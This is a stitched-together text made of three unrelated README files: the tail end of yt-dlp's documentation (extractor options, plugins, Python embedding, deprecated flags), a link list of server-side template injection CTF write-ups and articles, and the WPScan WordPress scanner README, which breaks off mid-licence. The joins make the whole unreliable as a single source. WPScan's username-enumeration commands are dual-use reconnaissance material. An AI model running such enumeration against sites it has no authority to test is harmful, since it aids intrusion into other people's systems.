URL query to its variant playlist URLs if no value is provided, or else apply the query string given as `variant_query=VALUE` * `hls_key`: An HLS AES-128 key URI *or* key (as hex), and optionally the IV (as hex), in the form of `(URI|KEY)[,IV]`; e.g. `generic:hls_key=ABCDEF1234567980,0xFEDCBA0987654321`. Passing any of these values will force usage of the native HLS downloader and override the corresponding values found in the m3u8 playlist * `is_live`: Bypass live HLS detection and manually set `live_status` - a value of `false` will set `not_live`, any other value (or no value) will set `is_live` #### funimation * `language`: Audio languages to extract, e.g. `funimation:language=english,japanese` * `version`: The video version to extract - `uncut` or `simulcast` #### crunchyrollbeta (Crunchyroll) * `format`: Which stream type(s) to extract (default: `adaptive_hls`). Potentially useful values include `adaptive_hls`, `adaptive_dash`, `vo_adaptive_hls`, `vo_adaptive_dash`, `download_hls`, `download_dash`, `multitrack_adaptive_hls_v2` * `hardsub`: Preference order for which hardsub versions to extract, or `all` (default: `None` = no hardsubs), e.g. `crunchyrollbeta:hardsub=en-US,None` #### vikichannel * `video_types`: Types of videos to download - one or more of `episodes`, `movies`, `clips`, `trailers` #### niconico * `segment_duration`: Segment duration in milliseconds for HLS-DMC formats. Use it at your own risk since this feature **may result in your account termination.** #### youtubewebarchive * `check_all`: Try to check more at the cost of more requests. One or more of `thumbnails`, `captures` #### gamejolt * `comment_sort`: `hot` (default), `you` (cookies needed), `top`, `new` - choose comment sorting mode (on GameJolt's side) #### hotstar * `res`: resolution to ignore - one or more of `sd`, `hd`, `fhd` * `vcodec`: vcodec to ignore - one or more of `h264`, `h265`, `dvh265` * `dr`: dynamic range to ignore - one or more of `sdr`, `hdr10`, `dv` #### tiktok * `api_hostname`: Hostname to use for mobile API requests, e.g. `api-h2.tiktokv.com` * `app_version`: App version to call mobile APIs with - should be set along with `manifest_app_version`, e.g. `20.2.1` * `manifest_app_version`: Numeric app version to call mobile APIs with, e.g. `221` #### rokfinchannel * `tab`: Which tab to download - one of `new`, `top`, `videos`, `podcasts`, `streams`, `stacks` #### twitter * `legacy_api`: Force usage of the legacy Twitter API instead of the GraphQL API for tweet extraction. Has no effect if login cookies are passed #### stacommu, wrestleuniverse * `device_id`: UUID value assigned by the website and used to enforce device limits for paid livestream content. Can be found in browser local storage #### twitch * `client_id`: Client ID value to be sent with GraphQL requests, e.g. `twitch:client_id=kimne78kx3ncx6brgo4mv6wki5h1ko` #### nhkradirulive (NHK ใ‚‰ใ˜ใ‚‹โ˜…ใ‚‰ใ˜ใ‚‹ LIVE) * `area`: Which regional variation to extract. Valid areas are: `sapporo`, `sendai`, `tokyo`, `nagoya`, `osaka`, `hiroshima`, `matsuyama`, `fukuoka`. Defaults to `tokyo` **Note**: These options may be changed/removed in the future without concern for backward compatibility <!-- MANPAGE: MOVE "INSTALLATION" SECTION HERE --> # PLUGINS Note that **all** plugins are imported even if not invoked, and that **there are no checks** performed on plugin code. **Use plugins at your own risk and only if you trust the code!** Plugins can be of `<type>`s `extractor` or `postprocessor`. - Extractor plugins do not need to be enabled from the CLI and are automatically invoked when the input URL is suitable for it. - Extractor plugins take priority over builtin extractors. - Postprocessor plugins can be invoked using `--use-postprocessor NAME`. Plugins are loaded from the namespace packages `yt_dlp_plugins.extractor` and `yt_dlp_plugins.postprocessor`. In other words, the file structure on the disk looks something like: yt_dlp_plugins/ extractor/ myplugin.py postprocessor/ myplugin.py yt-dlp looks for these `yt_dlp_plugins` namespace folders in many locations (see below) and loads in plugins from **all** of them. See the [wiki for some known plugins](https://github.com/yt-dlp/yt-dlp/wiki/Plugins) ## Installing Plugins Plugins can be installed using various methods and locations. 1. **Configuration directories**: Plugin packages (containing a `yt_dlp_plugins` namespace folder) can be dropped into the following standard [configuration locations](#configuration): * **User Plugins** * `${XDG_CONFIG_HOME}/yt-dlp/plugins/<package name>/yt_dlp_plugins/` (recommended on Linux/macOS) * `${XDG_CONFIG_HOME}/yt-dlp-plugins/<package name>/yt_dlp_plugins/` * `${APPDATA}/yt-dlp/plugins/<package name>/yt_dlp_plugins/` (recommended on Windows) * `${APPDATA}/yt-dlp-plugins/<package name>/yt_dlp_plugins/` * `~/.yt-dlp/plugins/<package name>/yt_dlp_plugins/` * `~/yt-dlp-plugins/<package name>/yt_dlp_plugins/` * **System Plugins** * `/etc/yt-dlp/plugins/<package name>/yt_dlp_plugins/` * `/etc/yt-dlp-plugins/<package name>/yt_dlp_plugins/` 2. **Executable location**: Plugin packages can similarly be installed in a `yt-dlp-plugins` directory under the executable location (recommended for portable installations): * Binary: where `<root-dir>/yt-dlp.exe`, `<root-dir>/yt-dlp-plugins/<package name>/yt_dlp_plugins/` * Source: where `<root-dir>/yt_dlp/__main__.py`, `<root-dir>/yt-dlp-plugins/<package name>/yt_dlp_plugins/` 3. **pip and other locations in `PYTHONPATH`** * Plugin packages can be installed and managed using `pip`. See [yt-dlp-sample-plugins](https://github.com/yt-dlp/yt-dlp-sample-plugins) for an example. * Note: plugin files between plugin packages installed with pip must have unique filenames. * Any path in `PYTHONPATH` is searched in for the `yt_dlp_plugins` namespace folder. * Note: This does not apply for Pyinstaller/py2exe builds. `.zip`, `.egg` and `.whl` archives containing a `yt_dlp_plugins` namespace folder in their root are also supported as plugin packages. * e.g. `${XDG_CONFIG_HOME}/yt-dlp/plugins/mypluginpkg.zip` where `mypluginpkg.zip` contains `yt_dlp_plugins/<type>/myplugin.py` Run yt-dlp with `--verbose` to check if the plugin has been loaded. ## Developing Plugins See the [yt-dlp-sample-plugins](https://github.com/yt-dlp/yt-dlp-sample-plugins) repo for a template plugin package and the [Plugin Development](https://github.com/yt-dlp/yt-dlp/wiki/Plugin-Development) section of the wiki for a plugin development guide. All public classes with a name ending in `IE`/`PP` are imported from each file for extractors and postprocessors repectively. This respects underscore prefix (e.g. `_MyBasePluginIE` is private) and `__all__`. Modules can similarly be excluded by prefixing the module name with an underscore (e.g. `_myplugin.py`). To replace an existing extractor with a subclass of one, set the `plugin_name` class keyword argument (e.g. `class MyPluginIE(ABuiltInIE, plugin_name='myplugin')` will replace `ABuiltInIE` with `MyPluginIE`). Since the extractor replaces the parent, you should exclude the subclass extractor from being imported separately by making it private using one of the methods described above. If you are a plugin author, add [yt-dlp-plugins](https://github.com/topics/yt-dlp-plugins) as a topic to your repository for discoverability. See the [Developer Instructions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) on how to write and test an extractor. # EMBEDDING YT-DLP yt-dlp makes the best effort to be a good command-line program, and thus should be callable from any programming language. Your program should avoid parsing the normal stdout since they may change in future versions. Instead they should use options such as `-J`, `--print`, `--progress-template`, `--exec` etc to create console output that you can reliably reproduce and parse. From a Python program, you can embed yt-dlp in a more powerful fashion, like this: ```python from yt_dlp import YoutubeDL URLS = ['https://www.youtube.com/watch?v=BaW_jenozKc'] with YoutubeDL() as ydl: ydl.download(URLS) ``` Most likely, you'll want to use various options. For a list of options available, have a look at [`yt_dlp/YoutubeDL.py`](yt_dlp/YoutubeDL.py#L183) or `help(yt_dlp.YoutubeDL)` in a Python shell. If you are already familiar with the CLI, you can use [`devscripts/cli_to_api.py`](https://github.com/yt-dlp/yt-dlp/blob/master/devscripts/cli_to_api.py) to translate any CLI switches to `YoutubeDL` params. **Tip**: If you are porting your code from youtube-dl to yt-dlp, one important point to look out for is that we do not guarantee the return value of `YoutubeDL.extract_info` to be json serializable, or even be a dictionary. It will be dictionary-like, but if you want to ensure it is a serializable dictionary, pass it through `YoutubeDL.sanitize_info` as shown in the [example below](#extracting-information) ## Embedding examples #### Extracting information ```python import json import yt_dlp URL = 'https://www.youtube.com/watch?v=BaW_jenozKc' # โ„น๏ธ See help(yt_dlp.YoutubeDL) for a list of available options and public functions ydl_opts = {} with yt_dlp.YoutubeDL(ydl_opts) as ydl: info = ydl.extract_info(URL, download=False) # โ„น๏ธ ydl.sanitize_info makes the info json-serializable print(json.dumps(ydl.sanitize_info(info))) ``` #### Download using an info-json ```python import yt_dlp INFO_FILE = 'path/to/video.info.json' with yt_dlp.YoutubeDL() as ydl: error_code = ydl.download_with_info_file(INFO_FILE) print('Some videos failed to download' if error_code else 'All videos successfully downloaded') ``` #### Extract audio ```python import yt_dlp URLS = ['https://www.youtube.com/watch?v=BaW_jenozKc'] ydl_opts = { 'format': 'm4a/bestaudio/best', # โ„น๏ธ See help(yt_dlp.postprocessor) for a list of available Postprocessors and their arguments 'postprocessors': [{ # Extract audio using ffmpeg 'key': 'FFmpegExtractAudio', 'preferredcodec': 'm4a', }] } with yt_dlp.YoutubeDL(ydl_opts) as ydl: error_code = ydl.download(URLS) ``` #### Filter videos ```python import yt_dlp URLS = ['https://www.youtube.com/watch?v=BaW_jenozKc'] def longer_than_a_minute(info, *, incomplete): """Download only videos longer than a minute (or with unknown duration)""" duration = info.get('duration') if duration and duration < 60: return 'The video is too short' ydl_opts = { 'match_filter': longer_than_a_minute, } with yt_dlp.YoutubeDL(ydl_opts) as ydl: error_code = ydl.download(URLS) ``` #### Adding logger and progress hook ```python import yt_dlp URLS = ['https://www.youtube.com/watch?v=BaW_jenozKc'] class MyLogger: def debug(self, msg): # For compatibility with youtube-dl, both debug and info are passed into debug # You can distinguish them by the prefix '[debug] ' if msg.startswith('[debug] '): pass else: self.info(msg) def info(self, msg): pass def warning(self, msg): pass def error(self, msg): print(msg) # โ„น๏ธ See "progress_hooks" in help(yt_dlp.YoutubeDL) def my_hook(d): if d['status'] == 'finished': print('Done downloading, now post-processing ...') ydl_opts = { 'logger': MyLogger(), 'progress_hooks': [my_hook], } with yt_dlp.YoutubeDL(ydl_opts) as ydl: ydl.download(URLS) ``` #### Add a custom PostProcessor ```python import yt_dlp URLS = ['https://www.youtube.com/watch?v=BaW_jenozKc'] # โ„น๏ธ See help(yt_dlp.postprocessor.PostProcessor) class MyCustomPP(yt_dlp.postprocessor.PostProcessor): def run(self, info): self.to_screen('Doing stuff') return [], info with yt_dlp.YoutubeDL() as ydl: # โ„น๏ธ "when" can take any value in yt_dlp.utils.POSTPROCESS_WHEN ydl.add_post_processor(MyCustomPP(), when='pre_process') ydl.download(URLS) ``` #### Use a custom format selector ```python import yt_dlp URLS = ['https://www.youtube.com/watch?v=BaW_jenozKc'] def format_selector(ctx): """ Select the best video and the best audio that won't result in an mkv. NOTE: This is just an example and does not handle all cases """ # formats are already sorted worst to best formats = ctx.get('formats')[::-1] # acodec='none' means there is no audio best_video = next(f for f in formats if f['vcodec'] != 'none' and f['acodec'] == 'none') # find compatible audio extension audio_ext = {'mp4': 'm4a', 'webm': 'webm'}[best_video['ext']] # vcodec='none' means there is no video best_audio = next(f for f in formats if ( f['acodec'] != 'none' and f['vcodec'] == 'none' and f['ext'] == audio_ext)) # These are the minimum required fields for a merged format yield { 'format_id': f'{best_video["format_id"]}+{best_audio["format_id"]}', 'ext': best_video['ext'], 'requested_formats': [best_video, best_audio], # Must be + separated list of protocols 'protocol': f'{best_video["protocol"]}+{best_audio["protocol"]}' } ydl_opts = { 'format': format_selector, } with yt_dlp.YoutubeDL(ydl_opts) as ydl: ydl.download(URLS) ``` <!-- MANPAGE: MOVE "NEW FEATURES" SECTION HERE --> # DEPRECATED OPTIONS These are all the deprecated options and the current alternative to achieve the same effect #### Almost redundant options While these options are almost the same as their new counterparts, there are some differences that prevents them being redundant -j, --dump-json --print "%()j" -F, --list-formats --print formats_table --list-thumbnails --print thumbnails_table --print playlist:thumbnails_table --list-subs --print automatic_captions_table --print subtitles_table #### Redundant options While these options are redundant, they are still expected to be used due to their ease of use --get-description --print description --get-duration --print duration_string --get-filename --print filename --get-format --print format --get-id --print id --get-thumbnail --print thumbnail -e, --get-title --print title -g, --get-url --print urls --match-title REGEX --match-filter "title ~= (?i)REGEX" --reject-title REGEX --match-filter "title !~= (?i)REGEX" --min-views COUNT --match-filter "view_count >=? COUNT" --max-views COUNT --match-filter "view_count <=? COUNT" --break-on-reject Use --break-match-filter --user-agent UA --add-header "User-Agent:UA" --referer URL --add-header "Referer:URL" --playlist-start NUMBER -I NUMBER: --playlist-end NUMBER -I :NUMBER --playlist-reverse -I ::-1 --no-playlist-reverse Default --no-colors --color no_color #### Not recommended While these options still work, their use is not recommended since there are other alternatives to achieve the same --force-generic-extractor --ies generic,default --exec-before-download CMD --exec "before_dl:CMD" --no-exec-before-download --no-exec --all-formats -f all --all-subs --sub-langs all --write-subs --print-json -j --no-simulate --autonumber-size NUMBER Use string formatting, e.g. %(autonumber)03d --autonumber-start NUMBER Use internal field formatting like %(autonumber+NUMBER)s --id -o "%(id)s.%(ext)s" --metadata-from-title FORMAT --parse-metadata "%(title)s:FORMAT" --hls-prefer-native --downloader "m3u8:native" --hls-prefer-ffmpeg --downloader "m3u8:ffmpeg" --list-formats-old --compat-options list-formats (Alias: --no-list-formats-as-table) --list-formats-as-table --compat-options -list-formats [Default] (Alias: --no-list-formats-old) --youtube-skip-dash-manifest --extractor-args "youtube:skip=dash" (Alias: --no-youtube-include-dash-manifest) --youtube-skip-hls-manifest --extractor-args "youtube:skip=hls" (Alias: --no-youtube-include-hls-manifest) --youtube-include-dash-manifest Default (Alias: --no-youtube-skip-dash-manifest) --youtube-include-hls-manifest Default (Alias: --no-youtube-skip-hls-manifest) --geo-bypass --xff "default" --no-geo-bypass --xff "never" --geo-bypass-country CODE --xff CODE --geo-bypass-ip-block IP_BLOCK --xff IP_BLOCK #### Developer options These options are not intended to be used by the end-user --test Download only part of video for testing extractors --load-pages Load pages dumped by --write-pages --youtube-print-sig-code For testing youtube signatures --allow-unplayable-formats List unplayable formats also --no-allow-unplayable-formats Default #### Old aliases These are aliases that are no longer documented for various reasons --avconv-location --ffmpeg-location --clean-infojson --clean-info-json --cn-verification-proxy URL --geo-verification-proxy URL --dump-headers --print-traffic --dump-intermediate-pages --dump-pages --force-write-download-archive --force-write-archive --load-info --load-info-json --no-clean-infojson --no-clean-info-json --no-split-tracks --no-split-chapters --no-write-srt --no-write-subs --prefer-unsecure --prefer-insecure --rate-limit RATE --limit-rate RATE --split-tracks --split-chapters --srt-lang LANGS --sub-langs LANGS --trim-file-names LENGTH --trim-filenames LENGTH --write-srt --write-subs --yes-overwrites --force-overwrites #### Sponskrub Options Support for [SponSkrub](https://github.com/faissaloo/SponSkrub) has been deprecated in favor of the `--sponsorblock` options --sponskrub --sponsorblock-mark all --no-sponskrub --no-sponsorblock --sponskrub-cut --sponsorblock-remove all --no-sponskrub-cut --sponsorblock-remove -all --sponskrub-force Not applicable --no-sponskrub-force Not applicable --sponskrub-location Not applicable --sponskrub-args Not applicable #### No longer supported These options may no longer work as intended --prefer-avconv avconv is not officially supported by yt-dlp (Alias: --no-prefer-ffmpeg) --prefer-ffmpeg Default (Alias: --no-prefer-avconv) -C, --call-home Not implemented --no-call-home Default --include-ads No longer supported --no-include-ads Default --write-annotations No supported site has annotations now --no-write-annotations Default --compat-options seperate-video-versions No longer needed #### Removed These options were deprecated since 2014 and have now been entirely removed -A, --auto-number -o "%(autonumber)s-%(id)s.%(ext)s" -t, -l, --title, --literal -o "%(title)s-%(id)s.%(ext)s" # CONTRIBUTING See [CONTRIBUTING.md](CONTRIBUTING.md#contributing-to-yt-dlp) for instructions on [Opening an Issue](CONTRIBUTING.md#opening-an-issue) and [Contributing code to the project](CONTRIBUTING.md#developer-instructions) # WIKI See the [Wiki](https://github.com/yt-dlp/yt-dlp/wiki) for more information
# SSTI ![](ssrf.png) ## What is SSTI ? - Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. <a href="https://portswigger.net/web-security/server-side-template-injection">Portswigger Detailed explanation</a> <details> <summary>CTF-Writeups</summary> ## CTF-Writeups - [2017](#2017) - [2018](#2018) - [2019](#2019) - [2020](#2020) - [2021](#2021) - [2022](#2022) ### 2017 - <a href="https://ctf-writeups.ru/2k17/asis-ctf-finals-2017/golem-is-stupid/">Golem is stupid, Asis2017</a> - [ktrio3 : Shia Labeouf-off!, CSAW Quals](https://ctftime.org/writeup/7580) ### 2018 - <a href="https://medium.com/bugbountywriteup/angstromctf-2018-web-writeups-part-2-6c1ee586aa64">Abdelkader Belcaid : AngstromCTF 2018, Madlibs</a> - <a href="https://medium.com/bugbountywriteup/tokyowesterns-ctf-4th-2018-writeup-part-3-1c8510dfad3f">Abdelkader Belcaid : Tokyowesterns 2018,Shrine</a> - <a href="https://ctftime.org/writeup/11014">kazkiti : HackIT CTF 2018,Believers Case</a> - <a href="https://s0cket7.com/picoctf-web/">s0cket7 : picoctf _flask cards_ </a> - [kazkiti : TorPy,InCTF](https://ctftime.org/writeup/11519) - [flawwn : TorPy,InCTF](https://github.com/flawwan/CTF-Writeups/blob/master/inCTF2018/torpy.md) - [HaboobTeam : SimpleVN](https://github.com/HaboobTeam/BCTF-2018-write-up/raw/master/WEB/SimpleVN.pdf) ### 2019 - <a href="https://medium.com/bugbountywriteup/x-mas-2019-ctf-write-up-mercenary-hat-factory-ssti-53e82d58829e">Slamat : X-MAS 2019 CTF write-up (Mercenary Hat Factory) SSTI</a> - <a href="https://hell38vn.wordpress.com/2019/03/05/tamu-ctf2019-science-web/">hell38vn : tamuctf2019 Science</a> - <a href="https://nytr0gen.github.io/writeups/ctf/2019/09/09/defcamp-ctf-quals-2019.html">nytrogen : defcamp quals 2019,Movie Night</a> - <a href="https://redpwn.net/writeups/picoctf2019/empire2/">redpwn : picoctf _empire2_</a> - [Terjanq : Scam Generator, JUSTCTF ](https://hackmd.io/@terjanq/justctf_writeups#Scam-generator-web-2-solves-unfixed-amp-1-solve-fixed) - [Dvd848 : Science,TamuCTF](https://github.com/Dvd848/CTFs/blob/master/2019_TAMUctf/Science.md) - [noobintheshell : Science, TamuCTF](https://noobintheshell.medium.com/tamuctf2019-writeups-1-360f53008f7a#708a) - [kazkiti : repeeaaaat, EncryptCTF](https://ctftime.org/writeup/14342) ### 2020 - <a href="https://github.com/team0se7en/CTF-Writeups/blob/master/csictf2020/web/The_Usual_Suspects/README.md">team0se7en : csictf2020, Usual suspects</a> - [ahmed : the usual suspects, csictf](https://ahmed-belkahla.me/post/csictf2020/#the-usual-suspects-499pts-32-solves-) - <a href="https://hackerone.com/reports/895778">nirvana_msu : [H1-2006] CTF Writeup</a> - <a href="https://noxtal.com/writeups/2020/08/02/hacktivitycon-template-shack/">noxtal : hacktivitycon,template-shack</a> - [bootplug : http for pros,defcamp](https://github.com/bootplug/writeups/blob/master/2020/defcamp/writeups.md#http-for-pros) - [st98 : Notes,hexion](https://st98.github.io/diary/posts/2020-04-13-hexion-ctf-2020-online.html#web-881-notes-37-solves) - [Arashparsa : SimpleFlask, GACTF](https://www.arashparsa.com/gactf/) - [SamXML : Congenial Octo Couscous, TJCTF](https://drive.google.com/file/d/1SMHzyP9jwN3vslfYU2kejVU-crYfnD8P/view) - [Kazkiti : Notepad, Zer0pts](https://ctftime.org/writeup/18597) - [posix : Notepad, Zer0pts](https://blog.p6.is/zer0pts-CTF-2020/) - [hamayanhamayan : Notepad, Zero0pts](https://blog.hamayanhamayan.com/entry/2020/03/09/131651) - [v4681d : MicroService, SUSEC](https://ctftime.org/writeup/18951) - [Ox12A0F : Memehub, Bsides Algiers quals](https://ctftime.org/writeup/25435) - [justjosef : Faraday, EkoParty](https://ctftime.org/writeup/23840) - [spotless : Newsletter, VolgaCTF quals](https://spotless.tech/volgactf-2020-qualifier-newsletter.html) ### 2021 - [guyintheshell : maze,0x41414141](https://www.youtube.com/watch?v=YA8wcG1GL8A) - [luftenshjaltar : maze,0x41414141](https://luftenshjaltar.info/writeups/0x41414141ctf/web/maze/) - [Sqrtrev : DMM,DarkCON](https://vuln.live/blog/12) - [beerpwn : Localization is hard(thymeleaf SSTI),AerpCTF](https://beerpwn.github.io/ctf/2021/aero_CTF/web/Localization_is_hard/) - [n4sm : Localization is hard,AeroCTF](https://ret2school.github.io/post/localization_is_hard_wu/) - [isopach : Injection, DCTF](https://isopach.dev/DCTF-2021/#injection) - [luc : Lotion,Foobar](https://szymanski.ninja/en/ctfwriteups/2021/foobar/lotion/) - [xxonorg : Injection, DCTF](https://github.com/xxonorg/dCTF2021_Writeup/blob/main/Injection.md) - [manhnv : Starfleet, CyberApocalypse](https://manhnv.com/2021/04/cyber-apocalypse-2021-web-starfleet-writeup/) - [ryan-cd : ninja name generator, InterIUT](https://github.com/ryan-cd/ctf/tree/master/2020/interIUT/ninja_name_generator) - [ianjelot : AgentTester, Nahamcon](https://thegoonies.github.io/2021/03/15/nahamconctf-2021-agent-tester-v2/) ### 2022 - [hongwei : gotm, LINE CTF](https://hong5489.github.io/2022-03-27-linectf2022/#gotm) - [r4f705 : 1 truth,2 lies. 1337UP LIVE CTF](https://ctftime.org/writeup/32473) - [LazyTitan : Naughty or Nice,HTB CyberSanta](https://github.com/LazyTitan33/CTF-Writeups/blob/main/HTB%20-%20Cyber%20Santa%20is%20Coming%20to%20Town%202021/Web/Naughty%20or%20Nice.md) - [Kashmir54 : Hey-Buddy, VishwaCTF](https://kashmir54.github.io/ctfs/VishwaCTF2022/#hey-buddy) - [x-c-3 : Mr 0, PatriotCTF](https://x-c-3.github.io/posts/patriotctf-2022/#mr-o) - [SamXML : Deafcon, Nahamcon](https://ctftime.org/writeup/33440) </details> <details> <summary>other interesting reads</summary> ### other interesting reads - <a href="https://we45.com/blog/server-side-template-injection-a-crash-course/">we45 : SSTI Crash Course</a> - <a href="https://portswigger.net/research/server-side-template-injection">Portswigger : SSTI Research</a> - <a href="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection">Hacktricks : SSTI</a> - <a href="https://musyokaian.medium.com/server-side-template-injection-ssti-afa201f2afbb">Musyoka Ian : SSTI explanation</a> - <a href="https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/">onsecurity SSTI with jinja2</a> - <a href="https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee">SSTI in flask/jinja2</a> - <a href="https://blog.cobalt.io/a-pentesters-guide-to-server-side-template-injection-ssti-c5e3998eae68">cobalt : pentesters guide to SSTI</a> - <a href="https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti">SSTI : cheatsheet</a> - <a href="https://0x1.gitlab.io/web-security/Server-Side-Template-Injection/">0x1 : SSTI</a> - <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2">PayloadAllTheThings : SSTI</a> - [Jinja2 SSTI Filter bypass](https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f) - [0day : JInja2 template injection filter bypasses](https://0day.work/jinja2-template-injection-filter-bypasses/) - [acunetix : exploiting ssti in thymeleaf](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/) - [veracode : Spring-view manipulation vulnerability](https://www.veracode.com/blog/secure-development/spring-view-manipulation-vulnerability) - [Hacktricks : thymeleaf java SSTI](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#thymeleaf-java) - [posix :Python-SSTI-exploitable-classes ](https://blog.p6.is/Python-SSTI-exploitable-classes/) </details> <details> <summary>Youtube Videos</summary> ### Youtube Videos - <a href="https://www.youtube.com/watch?v=SN6EVIG4c-0">Pwnfunction : SSTI Explained</a> - <a href="https://www.youtube.com/watch?v=WNo0GJl0Keo">Sam : SSTI</a> - <a href="https://www.youtube.com/watch?v=jRiz8Yg9vbA">Cobalt : SSTI all-in-one</a> </details>
<p align="center"> <a href="https://wpscan.org/"> <img src="https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png" alt="WPScan logo"> </a> </p> <h3 align="center">WPScan</h3> <p align="center"> WordPress Vulnerability Scanner <br> <br> <a href="https://wpscan.org/" title="homepage" target="_blank">Homepage</a> - <a href="https://wpscan.io/" title="wpscan.io" target="_blank">WPScan.io</a> - <a href="https://wpvulndb.com/" title="vulnerability database" target="_blank">Vulnerability Database</a> - <a href="https://wordpress.org/plugins/wpscan/" title="wordpress plugin" target="_blank">WordPress Plugin</a> </p> <p align="center"> <a href="https://badge.fury.io/rb/wpscan" target="_blank"><img src="https://badge.fury.io/rb/wpscan.svg"></a> <a href="https://github.com/wpscanteam/wpscan/actions?query=workflow%3ABuild" target="_blank"><img src="https://github.com/wpscanteam/wpscan/workflows/Build/badge.svg"></a> <a href="https://codeclimate.com/github/wpscanteam/wpscan" target="_blank"><img src="https://codeclimate.com/github/wpscanteam/wpscan/badges/gpa.svg"></a> </p> # INSTALL ## Prerequisites - (Optional but highly recommended: [RVM](https://rvm.io/rvm/install)) - Ruby >= 2.3 - Recommended: latest - Ruby 2.5.0 to 2.5.3 can cause an 'undefined symbol: rmpd_util_str_to_d' error in some systems, see [#1283](https://github.com/wpscanteam/wpscan/issues/1283) - Curl >= 7.21 - Recommended: latest - The 7.29 has a segfault - RubyGems - Recommended: latest - Nokogiri might require packages to be installed via your package manager depending on your OS, see https://nokogiri.org/tutorials/installing_nokogiri.html ### From RubyGems (Recommended) ```shell gem install wpscan ``` On MacOSX, if a ```Gem::FilePermissionError``` is raised due to the Apple's System Integrity Protection (SIP), either install RVM and install wpscan again, or run ```sudo gem install -n /usr/local/bin wpscan``` (see [#1286](https://github.com/wpscanteam/wpscan/issues/1286)) ### From sources (NOT Recommended) Prerequisites: Git ```shell git clone https://github.com/wpscanteam/wpscan cd wpscan/ bundle install && rake install ``` # Updating You can update the local database by using ```wpscan --update``` Updating WPScan itself is either done via ```gem update wpscan``` or the packages manager (this is quite important for distributions such as in Kali Linux: ```apt-get update && apt-get upgrade```) depending how WPScan was (pre)installed # Docker Pull the repo with ```docker pull wpscanteam/wpscan``` Enumerating usernames ```shell docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # Usage ```wpscan --url blog.tld``` This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then ```wpscan --stealthy --url blog.tld``` can be used. As a result, when using the ```--enumerate``` option, don't forget to set the ```--plugins-detection``` accordingly, as its default is 'passive'. For more options, open a terminal and type ```wpscan --help``` (if you built wpscan from the source, you should type the command outside of the git repo) The DB is located at ~/.wpscan/db ## Vulnerability Database The WPScan CLI tool uses the [WPVulnDB API](https://wpvulndb.com/api) to retrieve WordPress vulnerability data in real time. For WPScan to retrieve the vulnerability data an API token must be supplied via the `--api-token` option, or via a configuration file, as discussed below. An API token can be obtained by registering an account on [WPVulnDB](https://wpvulndb.com/users/sign_up). Up to 50 API requests per day are given free of charge to registered users. Once the 50 API requests are exhausted, WPScan will continue to work as normal but without any vulnerability data. Users can upgrade to paid API usage to increase their API limits within their user profile on [WPVulnDB](https://wpvulndb.com/). ## Load CLI options from file/s WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last): - ~/.wpscan/scan.json - ~/.wpscan/scan.yml - pwd/.wpscan/scan.json - pwd/.wpscan/scan.yml If those files exist, options from the `cli_options` key will be loaded and overridden if found twice. e.g: ~/.wpscan/scan.yml: ```yml cli_options: proxy: 'http://127.0.0.1:8080' verbose: true ``` pwd/.wpscan/scan.yml: ```yml cli_options: proxy: 'socks5://127.0.0.1:9090' url: 'http://target.tld' ``` Running ```wpscan``` in the current directory (pwd), is the same as ```wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld``` ## Save API Token in a file The feature mentioned above is useful to keep the API Token in a config file and not have to supply it via the CLI each time. To do so, create the ~/.wpscan/scan.yml file containing the below: ```yml cli_options: api_token: YOUR_API_TOKEN ``` ## Load APi Token From ENV The API Token will be automatically loaded from the ENV variable `WPSCAN_API_TOKEN` if present. If the `--api-token` CLI option is also provided, the value from the CLI will be used. ## Enumerating usernames ```shell wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # LICENSE ## WPScan Public Source License The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2019 WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. ### 1. Definitions 1.1 "License" means this document. 1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. 1.3 "WPScan Team" means WPScanโ€™s core developers. ### 2. Commercialization A commercial use is one intended for commercial advantage or monetary compensation. Example cases of commercialization are: - Using WPScan to provide commercial managed/Software-as-a-Service services. - Distributing WPScan as a commercial product or as part of one. - Using WPScan as a value added service/product. Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to): - Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. - Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux. - Using WPScan to test your own systems. - Any non-commercial use of WPScan. If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - [email protected]. Free-use Terms and Conditions; ### 3. Redistribution Redistribution is permitted under the following conditions: - Unmodified License is provided with WPScan. - Unmodified Copyright notices are provided with WPScan. - Does not conflict with the commercialization clause. ### 4. Copying Copying is permitted so long as it does not conflict with the Redistribution clause. ### 5. Modification Modification is permitted so long as it does not conflict with the Redistribution clause. ### 6. Contributions Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content. ### 7. Support WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team. ### 8. Disclaimer of Warranty WPScan is provided under this License on an โ€œas isโ€ basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose 